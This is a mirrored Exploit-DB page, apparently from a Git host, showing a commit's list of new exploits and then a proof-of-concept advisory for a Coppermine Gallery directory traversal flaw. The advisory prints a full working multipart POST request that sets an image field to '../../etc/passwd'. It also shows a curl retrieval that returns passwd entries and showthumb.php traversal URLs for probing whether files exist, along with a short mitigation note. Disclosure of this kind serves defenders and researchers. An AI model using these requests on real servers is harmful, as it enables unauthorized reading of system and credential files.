bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41876.txt
Offensive Security aabd4b35b3 DB: 2017-04-14 
12 new exploits

Microsoft Windows Kernel win32k.sys - Multiple Bugs in the NtGdiGetDIBitsInternal System Call
Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure

PonyOS 3.0 - tty ioctl() Local Kernel Exploit
PonyOS 3.0 - TTY 'ioctl()' Local Kernel Exploit

Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation
Solaris 7 < 11 (x86 / SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation
GNS3 Mac OS-X 1.5.2 - 'ubridge' Privilege Escalation
PonyOS 4.0 - 'fluttershy' LD_LIBRARY_PATH Local Kernel Exploit
Adobe Creative Cloud Desktop Application <= 4.0.0.185 - Privilege Escalation

Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)
Ethernet Device Drivers Frame Padding - 'Etherleak' Infomation Leakage Exploit

Cisco Catalyst 2960 IOS 12.2(55)SE1 - 'ROCEM' Remote Code Execution

Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)
Coppermine Gallery < 1.5.44 - Directory Traversal Weaknesses
SedSystems D3 Decimator - Multiple Vulnerabilities
agorum core Pro 7.8.1.4-251 - Cross-Site Request Forgery
agorum core Pro 7.8.1.4-251 - Persistent Cross-Site Scripting
Alienvault OSSIM/USM 5.3.4/5.3.5 - Remote Command Execution (Metasploit)
2017-04-14 05:01:15 +00:00

90 lines
3.3 KiB
Text
Executable file
Raw Blame History

Coppermine Gallery <= 1.5.44 directory traversal vulnerability
==============================================================
Coppermine is a multi-purpose fully-featured and integrated web
picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend. A directory travesal vuln
exists within the "save_thumb" function of the "crop & rotate"
image feature. This can be accessed from pic_editor.php. First
upload a file, e.g. "hackerhouse.png" to an album. This will
create a predictable file path location with your userid e.g:
http://target/cpg15x/albums/userpics/10001/hackerhouse.png
You will then send a POST request to pic_editor to manipulate
this file but replace the "new_image" with the filepath you
want to read such as "../../../../../etc/passwd". Your file
will then by copied to a predictible path location as thumb.
http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
To exploit this vulnerability you will need to be able to
register an account and upload files to a photo album. You
do not need admin rights to exploit this flaw. All versions
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
to this flaw. The coppermine configuration was tested with
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.
To protect against this exploit do not allow public registration
requests and only allow trusted users to modify images.
Example POST request
====================
POST /cpg15x/pic_editor.php HTTP/1.1
Host: target
Content-Length: 802
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
Accept: text/html,
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: <cookies>
DNT: 1
Connection: close
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="clipval"
10
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="newimage"
../../../../../../../../../../../../../../etc/passwd
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="img_dir"
albums/edit/
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="id"
1
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="angle"
45
------WebKitFormBoundaryAE29AdEqShlpLpDF
100
------WebKitFormBoundaryAE29AdEqShlpLpDF
Content-Disposition: form-data; name="save_thumb"
Save as thumbnail
------WebKitFormBoundaryAE29AdEqShlpLpDF--
Example file download request
=============================
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
... snip
An additional directory traversal vulnerability is present
in "showthumb.php" which can be used to stat() for the existence
of files by reviewing the error returned. You must have
sufficient rights to use this feature however.
/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile
-- Hacker Fantastic
(http://www.myhackerhouse.com)
Reference in a new issue View git blame Copy permalink